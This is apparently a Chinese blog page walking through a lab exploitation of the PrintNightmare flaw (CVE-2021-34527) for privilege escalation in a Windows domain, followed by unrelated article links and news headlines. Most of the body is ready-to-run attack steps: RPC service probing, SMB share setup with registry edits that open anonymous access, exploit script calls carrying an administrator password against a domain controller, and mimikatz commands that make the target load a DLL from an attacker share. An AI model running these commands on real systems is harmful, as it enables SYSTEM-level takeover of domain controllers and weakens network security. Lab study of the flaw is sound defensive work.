当前位置: 首页 > news >正文

CVE-2021-34527: PrintNightmare 域内提权

  • 域控 ip:192.168.72.21,hostname:dc01

  • 域内攻击者机器 ip:192.168.72.158,hostname:WIN10-01

  • 攻击者 kali 机器 ip:192.168.72.162

如果目标机器开启 Print Spooler 服务,那么此漏洞允许攻击者将代码注入到 Print Spooler 服务的进程 spoolsv.exe 中,以 system 权限执行。

漏洞实验

检测是否开放MS-RPRN服务
python3 rpcdump.py @192.168.72.163 | grep MS-RPRN
linux创建smb服务

目的是为了让目标访问到Evil.dll

修改SMB配置文件/etc/samba/smb.conf:
[global]
map to guest = Bad User
server role = standalone server
user share allow guests = yes
idmap config* : backend=tdb
smb ports=445
​
[smb]
comment=Samba 
path=/tmp/
guest ok=yes
read only=no
browsable=yes

启动smb服务

#启动smb服务
service smbd start
service smbd status
windows创建smb服务
mkdir C:\share\
icacls C:\share\ /T /grant "ANONYMOUS LOGON":r
icacls C:\share\ /T /grant Everyone:r
powershell.exe New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
CVE-2021-1675.py 脚本攻击
python CVE-2021-1675.py HACK.com/administrator:p-0p-0p-0@192.168.72.21 \\192.168.72.158\share\demon.dll
​
python printnightmare.py -dll \\192.168.72.158\share\demon.dll administrator:p-0p-0p-0@192.168.72.21

这里可以看到我的环境下虽然能上传 dll,但是加载不了。

 

mimikatz攻击
mimikatz.exe "misc::printnightmare /server:192.168.72.163 /library:\\192.168.72.158\share\demon.x64.dll"
mimikatz.exe "misc::printnightmare /server:10.211.55.14 /library:\\10.211.55.7\share\1.dll"

相关文章:

  • linux--文件属性、目录的操作
  • 计算机网络之物理层——基于《计算机网络》谢希仁第八版
  • 计算机考研之数据结构:P 问题和 NP 问题
  • Spring监听器Listener
  • LLaMA-Factory|微调大语言模型初探索(3),qlora微调deepseek记录
  • qt:输入控件操作
  • 从0-1搭建mac环境最新版
  • Freertos学习第一篇-总体概述
  • springboot三层架构详细讲解
  • 输入搜索、分组展示选项、下拉选取,全局跳转页,el-select 实现 —— 后端数据处理代码,抛砖引玉展思路
  • Java之——“String类”(内容较多,结合目录察看分类)
  • CSS Grid 布局学习笔记
  • Android 之 AIDL for HAL
  • qt-C++笔记之创建和初始化 `QGraphicsScene` 和 `QGraphicsView` 并关联视图和场景的方法
  • React进阶之前端业务Hooks库(一)
  • 基于Spring Boot的RabbitMQ延时队列技术实现
  • 服务器Docker OOM RSS高问题排查思路
  • OLAPOLTP介绍及应用
  • 软件测试:1、单元测试
  • el-table已经选中的项,通过selectable属性不可以再次选择
  • 在古老的意大利科莫歌剧院,廖昌永唱响16首中国艺术歌曲
  • 乌总统:若与普京会谈,全面停火和交换战俘是主要议题
  • 西安市未央区委书记刘国荣已任西咸新区党工委书记
  • 上海市重大工程一季度开局良好,崇明线等按既定计划加快建设
  • 杭州“放大招”支持足球发展:足球人才可评“高层次人才”
  • 75万买299元路由器后续:重庆市纪委、财政局、教委联合调查